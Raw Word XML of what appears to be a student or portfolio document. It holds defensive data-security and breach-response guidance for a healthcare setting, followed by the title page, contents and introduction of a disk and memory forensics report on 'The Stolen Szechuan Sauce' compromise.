          <w:numId w:val="2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Data Access: Access to patient personal and insurance information for scheduling appointments, managing billing, and processing insurance claims. No access to patient medical records or financial data beyond what is necessary for their administrative tasks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">.</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Data Security Measures</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Encryption:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> All sensitive data, both at rest and in transit, should be encrypted to protect it from unauthorized access. This includes patient medical records, personal information, and financial data. Encryption ensures that even if data is compromised, it remains u</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">nreadable without the decryption key.</w:t>
        <w:br/>
        <w:br/>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Access Controls:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Implement strong access controls, including multi-factor authentication (MFA) and role-based access control (RBAC), to limit access to sensitive data based on job roles and responsibilities. This prevents unauthorized users from accessing sensitive inform</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">ation and ensures that employees can only access the data they need to perform their duties.</w:t>
        <w:br/>
        <w:br/>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Regular Security Audits:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Conduct regular security audits and vulnerability assessments to identify and address potential</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="14"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">security weaknesses. This includes reviewing access controls, testing security configurations, and performing penetration testing to simulate real-world attacks. Regular audits help ensure that security measures remain effective and up-to-date.  </w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing w:after="240" w:before="0" w:line="331" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:hyperlink r:id="rId9" w:tooltip="https://www.deskera.com/blog/ai-revolution-production-scheduling-manufacturing/" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="186"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="22"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">1. www.deskera.com</w:t>
          <w:br/>
          <w:br/>
        </w:r>
      </w:hyperlink>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b/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Data Breach Response Plan</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Containment:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Immediately take steps to contain the breach and prevent further unauthorized access. This may involve isolating affected systems, changing passwords, and revoking access credentials.</w:t>
        <w:br/>
        <w:br/>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Investigation:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Conduct a thorough investigation to determine the scope of the breach, identify the affected data, and assess the potential impact. This will involve collecting evidence, analyzing logs, and interviewing relevant personnel.</w:t>
        <w:br/>
        <w:br/>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Notification:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Notify affected individuals, regulatory authorities, and law enforcement as required by applicable laws and regulations. Provide clear and accurate information about the breach, including the types of data affected and the steps taken to mitigate the impa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">ct.</w:t>
        <w:b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This response plan provides a basic framework for handling a data breach. The specific actions taken will depend on the nature and severity of the breach. It is crucial to have a detailed and well-rehearsed incident response plan in place to ensure a swift</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> and effective response to any data security incident.</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80" w:before="0" w:line="331" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="64"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Forensics Report and Documentation On</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="0" w:line="331" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="64"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">The Stolen Szechuan Sauce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160" w:before="0" w:line="331" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="48"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Prepared by: Remilekun Fowosire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Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="48"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">December 15th, 2024</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60" w:line="288" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:hyperlink r:id="rId10" w:tooltip="https://docs.google.com/document/d/1Hla5SGinX2u34Wh7IVvRiDpM4oMariaRGauS8Ra1VsU/edit?tab=t.0#heading=h.7jb0gjg0skfk" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="186"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b/>
            <w:color w:val="000000"/>
            <w:sz w:val="22"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t xml:space="preserve">Introduction</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="186"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b/>
            <w:color w:val="000000"/>
            <w:sz w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="186"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b/>
            <w:color w:val="000000"/>
            <w:sz w:val="22"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t xml:space="preserve">4</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0"/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:hyperlink r:id="rId11" w:tooltip="https://docs.google.com/document/d/1Hla5SGinX2u34Wh7IVvRiDpM4oMariaRGauS8Ra1VsU/edit?tab=t.0#heading=h.lgwsydd8ton8" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="186"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b/>
            <w:color w:val="000000"/>
            <w:sz w:val="22"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t xml:space="preserve">Executive Summary</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="186"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b/>
            <w:color w:val="000000"/>
            <w:sz w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="186"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b/>
            <w:color w:val="000000"/>
            <w:sz w:val="22"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t xml:space="preserve">4</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2" w:tooltip="https://docs.google.com/document/d/1Hla5SGinX2u34Wh7IVvRiDpM4oMariaRGauS8Ra1VsU/edit?tab=t.0#heading=h.6slaqytm6rng" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="186"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="000000"/>
            <w:sz w:val="22"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t xml:space="preserve">Overview of the Initial Entry Vector</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="186"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="000000"/>
            <w:sz w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="186"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="000000"/>
            <w:sz w:val="22"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t xml:space="preserve">4</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3" w:tooltip="https://docs.google.com/document/d/1Hla5SGinX2u34Wh7IVvRiDpM4oMariaRGauS8Ra1VsU/edit?tab=t.0#heading=h.mrzlem96bn5g" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="186"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="000000"/>
            <w:sz w:val="22"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t xml:space="preserve">Evidence Collection Process</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="186"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="000000"/>
            <w:sz w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="186"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="000000"/>
            <w:sz w:val="22"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t xml:space="preserve">5</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4" w:tooltip="https://docs.google.com/document/d/1Hla5SGinX2u34Wh7IVvRiDpM4oMariaRGauS8Ra1VsU/edit?tab=t.0#heading=h.s8nizy38zjid" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="186"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="000000"/>
            <w:sz w:val="22"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t xml:space="preserve">Brute-Force Detection</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="186"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="000000"/>
            <w:sz w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="186"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="000000"/>
            <w:sz w:val="22"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t xml:space="preserve">5</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5" w:tooltip="https://docs.google.com/document/d/1Hla5SGinX2u34Wh7IVvRiDpM4oMariaRGauS8Ra1VsU/edit?tab=t.0#heading=h.w20zf539zk50" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="186"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="000000"/>
            <w:sz w:val="22"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t xml:space="preserve">Successful Logins and Malware Delivery</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="186"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="000000"/>
            <w:sz w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="186"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="000000"/>
            <w:sz w:val="22"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t xml:space="preserve">5</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6" w:tooltip="https://docs.google.com/document/d/1Hla5SGinX2u34Wh7IVvRiDpM4oMariaRGauS8Ra1VsU/edit?tab=t.0#heading=h.7ei6cehqau9m" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="186"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="000000"/>
            <w:sz w:val="22"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t xml:space="preserve">Vulnerability Exploited</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="186"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="000000"/>
            <w:sz w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="186"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="000000"/>
            <w:sz w:val="22"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t xml:space="preserve">6</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720"/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:hyperlink r:id="rId17" w:tooltip="https://docs.google.com/document/d/1Hla5SGinX2u34Wh7IVvRiDpM4oMariaRGauS8Ra1VsU/edit?tab=t.0#heading=h.6700mxurm0jk" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="186"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="000000"/>
            <w:sz w:val="22"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t xml:space="preserve">Key Takeaways</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="186"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="000000"/>
            <w:sz w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="186"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="000000"/>
            <w:sz w:val="22"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t xml:space="preserve">6</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360"/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:hyperlink r:id="rId18" w:tooltip="https://docs.google.com/document/d/1Hla5SGinX2u34Wh7IVvRiDpM4oMariaRGauS8Ra1VsU/edit?tab=t.0#heading=h.a6qj6d6ob5us" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="186"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="000000"/>
            <w:sz w:val="22"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t xml:space="preserve">Detailed Report</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="186"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="000000"/>
            <w:sz w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="186"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="000000"/>
            <w:sz w:val="22"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t xml:space="preserve">6</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360"/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:hyperlink r:id="rId19" w:tooltip="https://docs.google.com/document/d/1Hla5SGinX2u34Wh7IVvRiDpM4oMariaRGauS8Ra1VsU/edit?tab=t.0#heading=h.vt7pa9pnxleo" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="186"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="000000"/>
            <w:sz w:val="22"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t xml:space="preserve">Conclusion</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="186"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="000000"/>
            <w:sz w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="186"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="000000"/>
            <w:sz w:val="22"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t xml:space="preserve">31</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360"/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:hyperlink r:id="rId20" w:tooltip="https://docs.google.com/document/d/1Hla5SGinX2u34Wh7IVvRiDpM4oMariaRGauS8Ra1VsU/edit?tab=t.0#heading=h.kmkzvadw8vtf" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="186"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="000000"/>
            <w:sz w:val="22"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t xml:space="preserve">Recommendations</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="186"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="000000"/>
            <w:sz w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="186"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="000000"/>
            <w:sz w:val="22"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t xml:space="preserve">31</w:t>
        </w:r>
      </w:hyperlink>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing w:after="0" w:before="60" w:line="288" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0" w:left="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:hyperlink r:id="rId21" w:tooltip="https://docs.google.com/document/d/1Hla5SGinX2u34Wh7IVvRiDpM4oMariaRGauS8Ra1VsU/edit?tab=t.0#heading=h.3jsa2kcfxixu" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="186"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="000000"/>
            <w:sz w:val="22"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t xml:space="preserve">References</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="186"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="000000"/>
            <w:sz w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="186"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="000000"/>
            <w:sz w:val="22"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t xml:space="preserve">32</w:t>
        </w:r>
      </w:hyperlink>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8"/>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="360" w:line="331" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Introduction</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="0" w:line="331" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">In the face of evolving cybersecurity threats, organizations must conduct comprehensive forensic investigations when potential breaches occur to determine if sensitive data has been accessed or stolen. This report addresses a suspected incident involving t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">he compromise of a Windows Server (Domain Controller) and associated Desktop systems, with critical files, including a sensitive "Szechuan sauce" recipe, potentially exfiltrated by an attacker.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="0" w:line="331" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Leveraging FTK Imager for disk forensics and Volatility3 for memory analysis, we will answer key questions related to the attack lifecycle, including:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Identification of malicious activity and the initial entry vector.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Detection of malware and its behavior (e.g., file locations, persistence mechanisms, and network connections).</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Verification of file access, copying, or exfiltration.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="0" w:line="331" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
